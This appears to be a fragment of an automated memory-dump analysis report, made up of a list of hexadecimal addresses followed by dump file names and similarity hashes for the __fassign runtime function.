                                                                                                                                                    0x0205fd73
                                                                                                                                                    0x0205fd73
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0205fd73
                                                                                                                                                    0x0208ec95
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208eca1
                                                                                                                                                    0x0208eca4
                                                                                                                                                    0x0208eca5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208eca5
                                                                                                                                                    0x0208ec7a
                                                                                                                                                    0x0205fd4a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0205fd6e
                                                                                                                                                    0x0205fd6e
                                                                                                                                                    0x0205fd71
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0205fd71
                                                                                                                                                    0x0205fd4a
                                                                                                                                                    0x0205fd21
                                                                                                                                                    0x0206a3a1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0206a3a1
                                                                                                                                                    0x0205fd36
                                                                                                                                                    0x0207200b
                                                                                                                                                    0x02072012
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02072018
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02072018
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0205fd36
                                                                                                                                                    0x0205fe0f
                                                                                                                                                    0x0205fe16
                                                                                                                                                    0x0206a3ad
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0206a3b3
                                                                                                                                                    0x0206a3b3
                                                                                                                                                    0x0205fe1f
                                                                                                                                                    0x0208ed25
                                                                                                                                                    0x0208ed86
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208ed91
                                                                                                                                                    0x0208ed95
                                                                                                                                                    0x0208ed95
                                                                                                                                                    0x0208ed9a
                                                                                                                                                    0x0208edad
                                                                                                                                                    0x0208edb3
                                                                                                                                                    0x0208edba
                                                                                                                                                    0x0208edc4
                                                                                                                                                    0x0208edc9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208edcc
                                                                                                                                                    0x0208ed2a
                                                                                                                                                    0x0208ed55
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208ed61
                                                                                                                                                    0x0208ed66
                                                                                                                                                    0x0208ed6e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208ed7d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208ed7d
                                                                                                                                                    0x0208ed30
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208ed3c
                                                                                                                                                    0x0208ed43
                                                                                                                                                    0x0208ed4b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __fassign
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3965848254-0
                                                                                                                                                    • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                    • Instruction ID: 5334a878e43e28f97e471720447d44306f9bc2d42f7eded202afcfa61efacc05
                                                                                                                                                    • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                    • Instruction Fuzzy Hash: 0D91BF31D0032AEADF25EF58C8487EFBBF9EF42308F20806AD845A6551E7745A45EB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%